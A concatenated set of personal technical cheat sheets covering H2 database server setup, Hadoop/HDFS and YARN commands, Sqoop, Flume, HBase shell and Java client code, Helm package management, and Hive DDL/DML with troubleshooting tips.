java -jar h2-1.4.192.jar  -webAllowOthers -webPort 9108 -tcpAllowOthers -tcpPort 9101 -tcpPassword sa -baseDir C:\project\h2-server 

connection to server

jdbc:h2:tcp://localhost:9101/user-manager.h2

connection to server with database creation

jdbc:h2:tcp://localhost:9101/new-database-

Server mode connection

!!! file placed into the same folder when application was started !!! path with current folder - mandatory

jdbc:h2:tcp://localhost:9101/./user-manager.h2

maven dependency

    <dependency>
      <groupId>com.h2database</groupId>
      <artifactId>h2</artifactId>
      <version>1.4.197</version>
    </dependency>

create connection

    private Connection obtainJdbcConnection(String url, String user, String password) {
        try{
            return DriverManager.getConnection(url, user, password);
        }catch(SQLException ex){
            throw new IllegalArgumentException(String.format("can't obtain connection from jdbc: %s, user:%s, password: %s ", url, user, password), ex);
        }
    }

create user

create user if not exists sonar password 'sonar' admin;

create schema

create schema sonar authorization sonar;
SET SCHEMA sonar;

Hadoop cheat sheet

Theory

what data, information, knowledge, experience are

Map-Reduce pattern

graph LR

m[🗺️ <b>MAP</b>] ==> c(combine)
c --> s(🔄 shuffle 
        📑 'sort') --> r[🧮 <b>REDUCE</b>]
Loading

YARN

Yet Another Resource Negotiator

Nodes

  • Namenode

    namespace, meta-info, file blocks
    single point of failure
    single point of communication for external clients

  • Datanode

    data block, send heartbeat to Namenode
    worker executed on DataNode worker associated with slot in DataNode

Daemons

  • Primary Node
  • Secondary Node
  • Data Node

file workflow

graph LR

is([input 
    splitter])
f[[file]]
s[[split]]
rr([record 
    reader])
r[[record]]
kv[[key
   value]]

if([input
    format])

f -.read
     one.-> is -.write 
                 many
                 (each mapper).-> s 
s -.read.-> rr -.create.-> r
r -.-> if
if -.-> kv
Loading

Hadoop into Docker container

  • MapR
  • Hortonworks
  • Cloudera

Hadoop run mode

  • standalone ( 1:1 )
  • pseudo-distributed ( 1:many )
  • distributed ( many:many )
docker run --hostname=quickstart.cloudera --privileged=true -t -i -p 7180 4239cd2958c6 /usr/bin/docker-quickstart

couldera run:

docker run -v /tmp:/home/root/tmp --net docker.local.network --ip 172.18.0.100 --hostname hadoop-local --network-alias hadoop-docker -t -i sequenceiq/hadoop-docker 

IBM education container start

docker run -it --name bdu_spark2 -P -p 4040:4040 -p 4041:4041 -p 8080:8080 -p8081:8081 bigdatauniversity/spark2:latest
-- /etc/bootstrap.sh -bash 

hadoop2 yarn hadoop1 sensor use case sensor use case sensor use case sensor use case sensor use case sensor use case

HDFS common commands

there are two possibilities for communication - shell(below), API
communication goes via NameNode

MapR implementation

# hdfs dfs -ls
hadoop fs -ls

admin command, cluster settings

hdfs dfsadmin -report

list of namenodes, list of secondary nodes

no data, not a part of hadoop cluster
Heartbeat: DataNode ---> NameNode

hdfs getconf -namenodes
hdfs getconf -secondaryNameNodes
hdfs getconf -confKey dfs.namenode.name.dir

stop-all.sh
start-all.sh
/etc/init.d/ha
/etc/init.d/hadoop-name

confKey:

  • dfs.namenode.name.dir
  • fs.defaultFS
  • yarn.resourcemanager.address
  • mapreduce.framework.name
  • dfs.namenode.name.dir
  • dfs.default.chunk.view.size
  • dfs.namenode.fs-limits.max-blocks-per-file
  • dfs.permissions.enabled
  • dfs.namenode.acls.enabled
  • dfs.replication
  • dfs.replication.max
  • dfs.namenode.replication.min
  • dfs.blocksize
  • dfs.client.block.write.retries
  • dfs.hosts.exclude
  • dfs.namenode.checkpoint.edits.dir
  • dfs.image.compress
  • dfs.image.compression.codec
  • dfs.user.home.dir.prefix
  • dfs.permissions.enabled
  • io.file.buffer.size
  • io.bytes-per-checksum
  • io.seqfile.local.dir

help ( Distributed File System )

hdfs dfs -help
hdfs dfs -help copyFromLocal
hdfs dfs -help ls
hdfs dfs -help cat
hdfs dfs -help setrep

list files

hdfs dfs -ls /user/root/input
hdfs dfs -ls hdfs://hadoop-local:9000/data
# -rw-r--r--   1 root supergroup       5107 2017-10-27 12:57 hdfs://hadoop-local:9000/data/Iris.csv
#              ^ factor of replication

files count

hdfs dfs -count /user/root/input

where 1-st column - amount of folder ( +1 current ), where 2-nd column - amount of files into folder where 3-rd column - size of folder

check if folder exists

hdfs dfs -test -d /user/root/some_folder
echo $?
# 0 - exists
# 1 - not exits

checksum ( md5sum )

hdfs dfs -checksum <path to file>

hdfs logic emulator

java -jar HadoopChecksumForLocalfile-1.0.jar V717777_MDF4_20190201.MF4 0 512 CRC32C

locally only

hdfs dfs -cat <path to file> | md5sum

find folders ( for cloudera only !!! )

hadoop jar /opt/cloudera/parcels/CDH/jars/search-mr-1.0.0-cdh5.14.4-job.jar org.apache.solr.hadoop.HdfsFindTool -find hdfs:///data/ingest/ -type d -name "some-name-of-the-directory"

find files ( for cloudera only !!! )

hadoop jar /opt/cloudera/parcels/CDH/jars/search-mr-1.0.0-cdh5.14.4-job.jar org.apache.solr.hadoop.HdfsFindTool -find hdfs:///data/ingest/ -type f -name "some-name-of-the-file"

change factor of replication

hdfs dfs -setrep -w 4 /data/file.txt

create folder

hdfs dfs -mkdir /data 

copy files from local filesystem to remote

hdfs dfs -put /home/root/tmp/Iris.csv /data/
hdfs dfs -copyFromLocal /home/root/tmp/Iris.csv /data/

copy files from local filesystem to remote with replication factor

hdfs dfs -Ddfs.replication=2 -put /path/to/local/file /path/to/hdfs

copy ( small files only !!! ) from local to remote ( read from DataNodes and write to DataNodes !!!)

hdfs dfs -cp /home/root/tmp/Iris.csv /data/

remote copy ( not used client as pipe )

hadoop distcp /home/root/tmp/Iris.csv /data/

read data from DataNode

hdfs get /path/to/hdfs /path/to/local/file
hdfs dfs -copyToLocal /path/to/hdfs /path/to/local/file

remove data from HDFS ( to Trash !!! special for each user)

hdfs rm -r /path/to/hdfs-folder

remove data from HDFS

hdfs rm -r -skipTrash /path/to/hdfs-folder

clean up trash bin

hdfs dfs -expunge

file info ( disk usage )

hdfs dfs -du -h /path/to/hdfs-folder

is file/folder exists ?

hdfs dfs -test /path/to/hdfs-folder

list of files ( / - root )

hdfs dfs -ls /
hdfs dfs -ls hdfs://192.168.1.10:8020/path/to/folder

the same as previous but with fs.defalut.name = hdfs://192.168.1.10:8020

hdfs dfs -ls /path/to/folder
hdfs dfs -ls file:///local/path   ==   (ls /local/path)

show all sub-folders

hdfs dfs -ls -r 

standard command for hdsf

-touchz, -cat (-text), -tail, -mkdir, -chmod, -chown, -count ....

java application run, java run, java build

hadoop classpath
hadoop classpath glob
# javac -classpath `hadoop classpath` MyProducer.java

Hadoop governance, administration

filesystem capacity, disk usage in human readable format

hdfs dfs -df -h

file system check, reporting, file system information

hdfs fsck /

balancer for distributed file system, necessary after failing/removing/eliminating some DataNode(s)

hdfs balancer

administration of the filesystem

hdfs dfsadmin -help

show statistic

hdfs dfsadmin -report

HDFS to "read-only" mode for external users

hdfs dfsadmin -safemode
hdfs dfsadmin -upgrade
hdfs dfsadmin -backup

Security

  • File permissions ( posix attributes )
  • Hive ( grant revoke )
  • Knox ( REST API for hadoop )
  • Ranger

job execution

flowchart RL

TT@{ shape: rect, label: "Task Tracker", color: red }

TT[Task Tracker] --o|composite| JT[Job Tracker]

JT -->|create| TT

TT -.->|send 
        hearbeat| JT
Loading

Task Tracker:

  • run Job Tracker
  • MapReduce governance
  • monitoring
  • restart tasks
hadoop jar {path to jar} {classname}
jarn jar {path to jar} {classname}

application list on YARN

yarn application --list

application list with ALL states

yarn application -list -appStates ALL

application status

yarn application -status application_1555573258694_20981

application kill on YARN

yarn application -kill application_1540813402987_3657

application log on YARN

yarn logs -applicationId application_1540813402987_3657 | less

application log on YARN by user

yarn logs -applicationId application_1540813402987_3657 -appOwner my_tech_user | less

YARN REST API

# https://hadoop.apache.org/docs/current/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html#Cluster_Writeable_APIs
# https://docs.cloudera.com/runtime/7.2.1/yarn-reference/topics/yarn-use-the-yarn-rest-apis-to-manage-applications.html
YARN_USER=$USER_AD
YARN_PASS=$USER_AD
YARN_URL=https://mapr-web.vantage.zur
YARN_PORT=10101

APP_ID=application_1670952222247_1113333
# application state 
curl --user $YARN_USER:$YARN_PASS --insecure $YARN_URL:$YARN_PORT/ws/v1/cluster/apps/$APP_ID/state
# kill application 
curl -v -X PUT -d '{"state": "KILLED"}' $YARN_URL:$YARN_PORT/ws/v1/cluster/apps/$APP_ID

# application find 
APP_TAG=33344447eb9c81f4fd7a
curl -X GET --user $YARN_USER:$YARN_PASS --insecure $YARN_URL:$YARN_PORT/ws/v1/cluster/apps?applicationTags=$APP_TAG | jq .

Hortonworks sandbox

tutorials ecosystem sandbox tutorial download install instruction getting started

Web SSH

localhost:4200
root/hadoop

SSH access

ssh root@localhost -p 2222

setup after installation, init, ambari password reset

  • shell web client (aka shell-in-a-box): localhost:4200 root / hadoop
  • ambari-admin-password-reset
  • ambari-agent restart
  • login into ambari: localhost:8080 admin/{your password}

Zeppelin UI

http://localhost:9995 user: maria_dev pass: maria_dev

install jupyter for spark

https://hortonworks.com/hadoop-tutorial/using-ipython-notebook-with-apache-spark/

PARK_MAJOR_VERSION is set to 2, using Spark2
Error in pyspark startup:
IPYTHON and IPYTHON_OPTS are removed in Spark 2.0+. Remove these from the environment and set PYSPARK_DRIVER_PYTHON and PYSPARK_DRIVER_PYTHON_OPTS instead.
just set variable to using Spart1 inside script: SPARK_MAJOR_VERSION=1

import

Import destinations:

  • text files
  • binary files
  • HBase
  • Hive
sqoop import --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --table customers --target-dir /crm/users/michael.csv  

additional parameter to leverage amount of mappers that working in parallel:

--split-by customer_id_pk

additional parameters:

--fields-terminated-by ','
--columns "name, age, address"
--where "age>30"
--query "select name, age, address from customers where age>30"

additional import parameters:

--as-textfile
--as-sequencefile
--as-avrodatafile

export

export modes:

  • insert
sqoop export --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --export-dir /crm/users/michael.csv --table customers 
  • update
sqoop export --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --export-dir /crm/users/michael.csv --udpate_key user_id
  • call ( store procedure will be executed )
sqoop export --connect jdbc:mysql://127.0.0.1/crm --username myuser --password mypassword --export-dir /crm/users/michael.csv --call customer_load

additional export parameters:

# row for a single insert
-Dsqoop.export.records.per.statement
# number of insert before commit
-Dexport.statements.per.transaction

java application run, java run, java build

mapr classpath
mapr classpath glob

compile java app, execute java app

javac -classpath `mapr classpath` MyProducer.java
java -classpath `mapr classpath`:. MyProducer

MDF4 reading

header = mdfreader.mdfinfo4.Info4("file.MF4")
header.keys()
header['AT'].keys()
header['AT'][768]['at_embedded_data']
info=mdfreader.mdfinfo()
info.listChannels("file.MF4")
from asammdf import MDF4 as MDF
mdf = MDF("file.MF4")

HCatalog

documentation
using for saving Hive metastore ( schema )

table description

hcat -e "describe school_explorer"
hcat -e "describe formatted school_explorer"

SQL engines

  • Hive ( HiveQL )

    for executing SQL-like queries
    transform the request to DirectAcyclingGraph

  • Impala
  • Phoenix ( HBase )
  • Drill ( schema-less sql )
  • BigSQL ( PostgreSQL + Hadoop )
  • Spark

workflow scheduler

START -> ACTION -> OK | ERROR

Cascading

TBD

Scalding

TBD


Hadoop streaming.

  • Storm ( real time streaming solution )
  • Spark ( near real time streaming, uses microbatching )
  • Samza ( streaming on top of Kafka )
  • Flink ( common approach to batch and stream code development )

Data storage, NoSQL

Accumulo

TBD

Druid

TBD

Sqoop ( SQl to/from hadOOP )

command line tool
JDBC driver for jdbc url must present: $SQOOP_HOME/lib

Flume

a Flume agent is a JVM process that hosts the components responsible for moving data.

(Event is generated)
        ↓
[ Source ]  → converts incoming data → [ Event ]
        ↓
[ Channel ]  ← holds the event temporarily
        ↓
[ Sink ]  → writes it to HDFS (or other systems)

Cluster management

  • cloudera manager

examples of map reduce

"Inverted Index":

  1. input data:
youtube.com: dog, gaming, music, video  
amazon.com: gaming, music, book  
safari.com: book, video
  1. map:
("dog", "youtube.com")
("gaming", "youtube.com")
("music", "youtube.com")
("video", "youtube.com")
("gaming", "amazon.com")
("music", "amazon.com")
("book", "amazon.com")
("book", "safari.com")
("video", "safari.com")
  1. shuffle:
dog: [youtube.com]  
gaming: [youtube.com, amazon.com]  
music: [youtube.com, amazon.com]  
video: [youtube.com, safari.com]  
book: [amazon.com, safari.com]
  1. sort
book: [amazon.com, safari.com]  
dog: [youtube.com]  
gaming: [amazon.com, youtube.com]  
music: [amazon.com, youtube.com]  
video: [safari.com, youtube.com]
  1. reduce
book: 2
dog: 1
gaming: 2
music: 2
video: 2

max value

  1. input data
london 9c time: 10:12
kiev 5c time: 14:15
vienna 5c time 20:07
london 11c time: 10:12
kiev 7c wind 3ms
  1. map
london 9
kiev 5
vienna 5
london 11
kiev 7
  1. shuffle
london 9,11
kiev 5,7
vienna 5
  1. reduce
london 11
kiev 7
vienna 5

TODO

download all slides from stepik - for repeating and creating xournals

HBase cheat sheet

  • distributed,
  • column-oriented persistent multidimensional sorted map
  • autoscale
  • storing column-family into memory/disc
  • disc = hdfs or filesystem
  • column familty (limited number) can be configured to:
    • compress
    • versions count
    • TimeToLive 'veracity'
    • in memory/on disc
    • separate file
  • key - is byte[], value is byte[]
  • scan by key
  • scan by keys range
  • schema free
  • each record has a version
  • TableName - filename
  • record looks like: RowKey ; ColumnFamilyName ; ColumnName ; Timestamp record
    record-view
  • table can divide into number of regions (sorted be key with start...end keys and controlled by HMaster )
  • region has default size 256Mb
data is sparse - a lot of column has null values
fast retrieving data by 'key of the row' + 'column name'
contains from: (HBase HMaster) *---> (HBase Region Server)

SQL for Hbase - Phoenix SQL

Why HBase

hbase-why.png

HBase Architecture

hbase-architecture.jpg

HBase ACID

hbase-acid.png

logical view

hbase-record-logical-view.png

phisical view

hbase-record-phisical-view.png

logical to phisical view

hbase-logical-to-phisical-view.png

Table characteristics

hbase-table-characteristics.png

Column-Family

hbase-column-family.png

manage HBase

start/stop hbase

$HBASE_HOME/bin/start-hbase.sh
$HBASE_HOME/bin/stop-hbase.sh

interactive shell

cheat sheet

$HBASE_HOME/bin/hbase shell

path to jars from hbase classpath

hbase classpath

commands

  • list of the tables
list
  • create table
create table 'mytable1'
  • description of the table
descibe 'my_space:mytable1'
  • count records
count 'my_space:mytable1'
  • delete table
drop table 'mytable1'
disable table 'mytable1'
  • iterate through a table, iterate with range
scan 'my_space:mytable1'
scan 'my_space:mytable1', {STARTROW=>"00223cfd-8b50-979d29164e72:1220", STOPROW=>"00223cfd-8b50-979d29164e72:1520"}
  • save results into a file
echo " scan 'my_space:mytable1', {STARTROW=>"00223cfd-8b50-979d29164e72:1220", STOPROW=>"00223cfd-8b50-979d29164e72:1520"} " | hbase shell > out.txt
  • insert data, update data
put 'mytable1', 'row0015', 'cf:MyColumnFamily2', 'my value 01'
  • read data
get 'mytable1', 'row0015'

Java

java app

java \
    -cp /opt/cloudera/parcels/SPARK2/lib/spark2/jars/*:`hbase classpath`:{{ deploy_dir }}/lib/ingest-pipeline-orchestrator-jar-with-dependencies.jar \
    -Djava.security.auth.login.config={{ deploy_dir }}/res/deploy.jaas \
    com.bmw.ad.ingest.pipeline.orchestrator.admin.TruncateSessionEntriesHelper \
    --hbase-zookeeper {{ hbase_zookeeper }} \
    --ingest-tracking-table-name {{ ingest_tracking_table }} \
    --file-meta-table-name {{ file_meta_table }} \
    --component-state-table-name {{ component_state_table }} \
    --session-id $1
  Scan scan = new Scan(Bytes.toBytes(startAndStopRow), Bytes.toBytes(startAndStopRow));
  scan.addColumn(FAMILY_NAME, COLUMN_NAME);
  // scan.setFilter(new FirstKeyOnlyFilter());
  ResultScanner scanner = this.table.getScanner(scan);
  try{
   for ( Result result : scanner) { // each next() call - RPC call to server
     System.out.println(result);
   }
  }finally{
   scanner.close(); // !!! IMPORTANT !!!
  }
}

get value

Get record = new Get(Bytes.toBytes("row_key"));
record.addColumn(bytes.toBytes("column_family"), bytes.toBytes("column_name"));
Result result = mytable1.get(record);
# or
byte[] value = result.getValue(Bytes.toBytes("column_family"),Bytes.toBytes("column_name"))

put record

Put row=new Put(Bytes.toBytes("rowKey"));
row.add(Bytes.toBytes("column_family"), Bytes.toBytes("column"), Bytes.toBytes("value1"));
table.put(row);
package com.learn.hbase.client;

import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hbase.HBaseConfiguration;
import org.apache.hadoop.hbase.TableName;
import org.apache.hadoop.hbase.client.Connection;
import org.apache.hadoop.hbase.client.ConnectionFactory;
import org.apache.hadoop.hbase.client.Put;
import org.apache.hadoop.hbase.client.Table;
import org.apache.hadoop.hbase.util.Bytes;

public class PutHBaseClient {

public static void main(String[] args) throws IOException {

  Configuration conf = HBaseConfiguration.create();

  Connection connection = ConnectionFactory.createConnection(conf);
  Table table = connection.getTable(TableName.valueOf("test"));
  try {

    Put put1 = new Put(Bytes.toBytes("row1"));

    put1.addColumn(Bytes.toBytes("cf"), Bytes.toBytes("qual1"), Bytes.toBytes("ValueOneForPut1Qual1"));
    put1.addColumn(Bytes.toBytes("cf"), Bytes.toBytes("qual2"), Bytes.toBytes("ValueOneForPut1Qual2"));

    table.put(put1);

  } finally {
    table.close();
    connection.close();
  }

}

}

update record

  • checkAndPut - compares the value with the current value from the hbase according to the passed CompareOp. CompareOp=EQUALS Adds the value to the put object if expected value is equal.
  • checkAndMutate - compares the value with the current value from the hbase according to the passed CompareOp.CompareOp=EQUALS Adds the value to the rowmutation object if expected value is equal.
    row mutation example
RowMutations mutations = new RowMutations(row);
//add new columns
Put put = new Put(row);
put.add(cf, col1, v1);
put.add(cf, col2, v2);

Delete delete = new Delete(row);
delete.deleteFamily(cf1, now);

//delete column family and add new columns to same family
mutations.add(delete);
mutations.add(put);

table.mutateRow(mutations);

delete value

Delete row=new Delete(Bytes.toBytes("rowKey"));
row.deleteColumn(Bytes.toBytes("column_family"), Bytes.toBytes("column"));
table.delete(row);
# or
table.deleteColumn(Bytes.toBytes("column_family"), Bytes.toBytes("column"), timestamp)
table.deleteColumns(Bytes.toBytes("column_family"), Bytes.toBytes("column"), timestamp)
table.deleteFamily(Bytes.toBytes("column_family"))

batch operation

Put put = 
Get get = 

Object[] results = new Object[2];
table.batch(List.of(put, get), results);

create table

Configuration config = HbaseConfiguration.create();

HBaseAdmin admin = new HbaseAdmin(config);

HTableDescriptor tableDescriptor = new HTableDescriptor(Bytes.toBytes("my_table1"));
HColumnDescriptor columns = new HColumnDescriptor(Bytes.toBytes("column_family_1"));
tableDescriptor.addFamily(columns);
admin.createTable(tableDescriptor);
admin.isTableAvailable(Bytes.toBytes("my_table1"));

package manager for Kubernetes
( similar to pip for python, similar to apt to debian )

links

helm charts

Architecture

main components

sudo snap install helm --classic
curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get | bash

de-installation

helm reset

initialization

helm init

# add new repo
helm repo add my_local_repo https://charts.bitnami.com/bitnami
# helm install --set replica.replicaCount=1 my_local_repo/redis

# sync latest available packages
helm repo update

useful variables

# the location of Helm's configuration
echo $HELM_HOME
# the host and port that Tiller is listening on
echo $TILLER_HOST
# the path to the helm command on your system
echo $HELM_BIN
# the full path to this plugin (not shown above, but we'll see it in a moment).
echo $HELM_PLUGIN_DIR

analyze local package

helm inspect { folder }
helm lint { folder }

search remote package

helm search 
helm describe {full name of the package}

information about remote package

helm info {name of resource}
helm status {name of resource}

create package locally

helm create 

folder structure

create package with local templates

ls -la ~/.helm/starters/

install package

helm install { full name of the package }
helm install --name {my name for new package} { full name of the package }
helm install --name {my name for new package} --namespace {namespace} -f values.yml --debug --dry-run { full name of the package }

# some examples 
helm install bitname/postgresql
helm install oci://registry-1.docker.io/bitnamicharts/postgresql
helm install my_own_postgresql bitname/postgresql

install aws plugin

helm plugin install https://github.com/hypnoglow/helm-s3.git

list of installed packages

helm list
helm list --all
helm ls

package upgrade

local package

helm upgrade  {deployment/svc/rs/rc name} . --set replicas=2,maria.db.password="new password"

package by name

helm upgrade {name of package} {folder with helm scripts} --set replicas=2

check upgrade

helm history
helm rollback {name of package} {revision of history}

remove packageHelm

helm delete --purge {name of package}

trouble shooting

issue with 'helm list'

E1209 22:25:57.285192    5149 portforward.go:331] an error occurred forwarding 40679 -> 44134: error forwarding port 44134 to pod de4963c7380948763c96bdda35e44ad8299477b41b5c4958f0902eb821565b19, uid : unable to do port forwarding: socat not found.
Error: transport is closing

solution

sudo apt install socat

incompatible version of client and server

Error: incompatible versions client[v2.12.3] server[v2.11.0]

solution

helm init --upgrade
kubectl get pods --namespace kube-system # waiting for start Tiller
helm version

issue with postgresql, issue with mapping PV ebs.csi.aws.com

"message": "running PreBind plugin \"VolumeBinding\": binding volumes: timed out waiting for the condition",

create local storage class instead of mapping to external ( EBS )

apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-storage
provisioner: kubernetes.io/no-provisioner
volumeBindingMode: Immediate
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: local-storage
spec:
  capacity:
    storage: 8Gi
  volumeMode: Filesystem
  accessModes:
    - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  storageClassName: local-storage
  local:
    path: /tmp
  nodeAffinity:
    required:
      nodeSelectorTerms:
        - matchExpressions:
            - key: kubernetes.io/hostname
              operator: In
              values:
                - <NODE_INSTANCE_IP>
helm repo add $HELM_BITNAMI_REPO https://charts.bitnami.com/bitnami
helm install $K8S_SERVICE_POSTGRESQL $HELM_BITNAMI_REPO/postgresql --set global.storageClass=local-storage

Hive cheat sheet

fixed data structure ( Pig - free data structure ) documentation description description cheat sheet sql to hive quick guide

*not supported full SQL, especially:"

  • transactions
  • materialized view
  • update
  • non-equality joins

metastore

HCatalog can be one of:

  • embedded in-process metastore in-process database
  • local in-process metastore out-of-process database
  • remote out-of-process metastore out-of-process database

hive command line interfaces

cheat sheet run interpreter

hive

run existing script into file

hive -f <filename>

new interpreter

beeline

Data units

Database namespace for tables separation -> Table unit of data inside some schema -> Partition virtual column ( example below ) -> Buckets data of column can be divided into buckets based on hash value Partition and Buckets serve to speed up queries during reading/joining

example of bucket existence

 database -> $WH/testdb.db
    table -> $WH/testdb.db/T
partition -> $WH/testdb.db/T/date=01012013
   bucket -> $WH/testdb.db/T/date=01012013/000032_0
( only 'bucket' is a file )

databases

SHOW DATABASES;
USE DATABASE default;
-- describe
DESCRIBE DATABASE my_own_database;
DESCRIBE DATABASE EXTENDED my_own_database;
-- delete database
DROP DATABASE IF EXISTS my_own_database;
-- alter database
ALTER DATABASE my_own_database SET DBPROPERTIES(...)

show all tables for selected database

SHOW TABLES;

DDL

types primitive

TINYINT SMALLINT INT BIGINT BOOLEAN ( TRUE/FALSE ) FLOAT DOUBLE DECIMAL STRING VARCHAR TIMESTAMP ( YYYY-MM-DD HH:MM:SS.ffffffff ) DATE ( YYYY-MM-DD )

cast ( string_column_value as FLOAT )

types comples

  • Arrays
array('a1', 'a2', 'a3')
  • Structs
struct('a1', 'a2', 'a3')
  • Maps
map('first', 1, 'second', 2, 'third', 3)
  • Union
create_union

create table

documentation table types:

  • managed data stored in subdirectories of 'hive.metastore.warehouse.dir' dropping managed table will drop all data on the disc too
  • external data stored outsice 'hive.metastore.warehouse.dir' dropping table will delete metadata only ''' CREATE EXTERNAL TABLE ... ... LOCATION '/my/path/to/folder' '''

create managed table with regular expression

CREATE TABLE apachelog (
  host STRING,
  identity STRING,
  user STRING,
  time STRING,
  request STRING,
  status STRING,
  size STRING,
  referer STRING,
  agent STRING)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
  "input.regex" = "([^]*) ([^]*) ([^]*) (-|\\[^\\]*\\]) ([^ \"]*|\"[^\"]*\") (-|[0-9]*) (-|[0-9]*)(?: ([^ \"]*|\".*\") ([^ \"]*|\".*\"))?"
)
STORED AS TEXTFILE;

create managed table with complex data

CREATE TABLE users{
id INT,
name STRING,
departments ARRAY<STRING>
} ROW FORMAT DELIMITED FIELD TERMINATED BY ','
            COLLECTION ITEMS TERMINATED BY ':'
STORED AS TEXTFILE;

1, Mike, sales|manager
2, Bob,  HR
3, Fred, manager| HR
4,Klava, manager|sales|developer|cleaner

create managed table with partition

CREATE TABLE users{
id INT,
name STRING,
departments ARRAY<STRING>
}
 PARTITIONED BY (office_location STRING ) 
 ROW FORMAT DELIMITED FIELD TERMINATED BY ','
            COLLECTION ITEMS TERMINATED BY ':'
STORED AS TEXTFILE;
--
-- representation on HDFS
$WH/mydatabase.db/users/office_location=USA
$WH/mydatabase.db/users/office_location=GERMANY

create external table from csv CSV format

CREATE EXTERNAL TABLE IF NOT EXISTS school_explorer(
	grade boolean,
	is_new boolean, 
	location string,
	name string, 
	sed_code STRING,
	location_code STRING, 
	district int,
	latitude float,
	longitude float,
	address string
)COMMENT 'School explorer from Kaggle'
ROW FORMAT DELIMITED FIELDS TERMINATED BY ',' 
STORED AS TEXTFILE LOCATION '/data/';
-- do not specify filename !!!!
-- ( all files into folder will be picked up )

create table from CSV format file

CREATE TABLE my_table(a string, b string, ...)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.OpenCSVSerde'
WITH SERDEPROPERTIES (
   "separatorChar" = "\t",
   "quoteChar"     = "'",
   "escapeChar"    = "\\"
)  
STORED AS TEXTFILE LOCATION '/data/';

create table from 'tab' delimiter

CREATE TABLE web_log(viewTime INT, userid BIGINT, url STRING, referrer STRING, ip STRING) 
ROW FORMAT DELIMITED FIELDS TERMINATED BY '\t'; 
LOAD DATA LOCAL INPATH '/home/mapr/sample-table.txt' INTO TABLE web_log;

JSON

CREATE TABLE my_table(a string, b bigint, ...)
ROW FORMAT SERDE 'org.apache.hive.hcatalog.data.JsonSerDe'
STORED AS TEXTFILE;

external Parquet

create external table parquet_table_name (x INT, y STRING)
  ROW FORMAT SERDE 'parquet.hive.serde.ParquetHiveSerDe'
  STORED AS 
    INPUTFORMAT "parquet.hive.DeprecatedParquetInputFormat"
    OUTPUTFORMAT "parquet.hive.DeprecatedParquetOutputFormat"
    LOCATION '/test-warehouse/tinytable';

drop table

DROP TABLE IF EXISTS users;

alter table - rename

ALTER TABLE users RENAME TO external_users;

alter table - add columns

ALTER TABLE users ADD COLUMNS{
age INT, children BOOLEAN
}

View

CREATE VIEW young_users SELECT name, age FROM users WHERE age<21;
DROP VIEW IF EXISTS young_users;

Index

create index for some specific field, will be saved into separate file

CREATE INDEX users_name ON TABLE users ( name ) AS 'users_name';

show index

SHOW INDEX ON users;

delete index

DROP INDEX users_name on users;

DML


load data into table

-- hdfs
LOAD DATA LOCAL INPATH '/home/user/my-prepared-data/' OVERWRITE INTO TABLE apachelog;
-- local file system
LOAD DATA INPATH '/data/' OVERWRITE INTO TABLE apachelog;
-- load data with partitions, override files on hdfs if they are exists ( without OVERWRITE )
LOAD DATA INPATH '/data/users/country_usa' INTO TABLE users PARTITION (office_location='USA', children='TRUE')
-- example of partition location: /user/hive/warehouse/my_database/users/office_location=USA/children=TRUE

data will be copied and saved into: /user/hive/warehouse if cell has wrong format - will be 'null'

insert data into table using select, insert select

INSERT OVERWRITE TABLE <table destination>
-- INSERT OVERWRITE TABLE <table destination>
-- CREATE TABLE <table destination>
SELECT <field1>, <field2>, ....
FROM <table source> s JOIN <table source another> s2 ON s.key_field=s2.key_field2
-- LEFT OUTER
-- FULL OUTER

export data from Hive, data external copy, data copy

INSERT OVERWRITE LOCAL DIRECTORY '/home/users/technik/users-db-usa'
SELECT name, office_location, age
FROM users
WHERE office_location='USA'

select

SELECT * FROM users LIMIT 1000;
SELECT name, department[0], age FROM users;
SELECT name, struct_filed_example.post_code FROM users ORDER BY age DESC;
SELECT .... FROM users GROUP BY age HEAVING MIN(age)>50
-- from sub-query
FROM ( SELECT * FROM users WHERE age>30 ) custom_sub_query SELECT custom_sub_query.name, custom_sub_query.office_location WHERE children==FALSE;


functions

-- if regular expression B can be applied to A
A RLIKE B
A REGEXP B
-- split string to elements
split
-- flat map, array to separated fields - instead of one field with array will be many record with one field
explode( array field )
-- extract part of the date: year, month, day
year(timestamp field)
-- extract json object from json string
get_json_object
-- common functions with SQL-92
A LIKE B
round
ceil
substr
upper
Length
count
sum
average

user defined functions

types

  • UDF
  • UDAggregatedFunctions
  • UDTablegeneratingFunctions

UDF, custom functions

<dependencies>
    <dependency>
        <groupId>org.apache.hadoop</groupId>
        <artifactId>hadoop-client</artifactId>
        <version>2.7.3</version>
        <scope>provided</scope>
    </dependency>
    <dependency>
        <groupId>org.apache.hive</groupId>
        <artifactId>hive-exec</artifactId>
        <version>1.2.1</version>
        <scope>provided</scope>
    </dependency>
</dependencies>
package com.mycompany.hive.lower;
import org.apache.hadoop.hive.ql.exec.Description;
import org.apache.hadoop.hive.ql.exec.UDF;
import org.apache.hadoop.io.*;

// Description of the UDF
@Description(
    name="ExampleUDF",
    value="analogue of lower in Oracle .",
    extended="select ExampleUDF(deviceplatform) from table;"
)
public class ExampleUDF extends UDF {
    public String evaluate(String input) {
        if(input == null)
            return null;
        return input.toLowerCase();
    }
}

after compillation into my-udf.jar

  hive> addjar my-udf.jar
  hive> create temporary function ExampleUDF using "com.mycompany.hive.lower";
  hive> SELECT ExampleUDF(value) from table;

#Streaming MAP(), REDUCE(), TRANSFORM()

SELECT TRANSFORM (name, age) 
USING '/bin/cat'
AS name, age FROM my_own_database.users;

troubleshooting

query explanation and understanding of the DirectAsyncGraph

EXPLAIN SELECT * FROM users ORDER BY age DESC;
EXPLAIN EXTENDED SELECT * FROM users ORDER BY age DESC;

jdbc connection issue:

TApplicationException: Required field 'client_protocol' is unset! 

reason:

This indicates a version mismatch between client and server, namely that the client is newer than the server, which is your case.

solution:

need to decrease version of the client
    compile group: 'org.apache.hive', name: 'hive-jdbc', version: '1.1.0'

hive html gui

  • ambari
  • hue
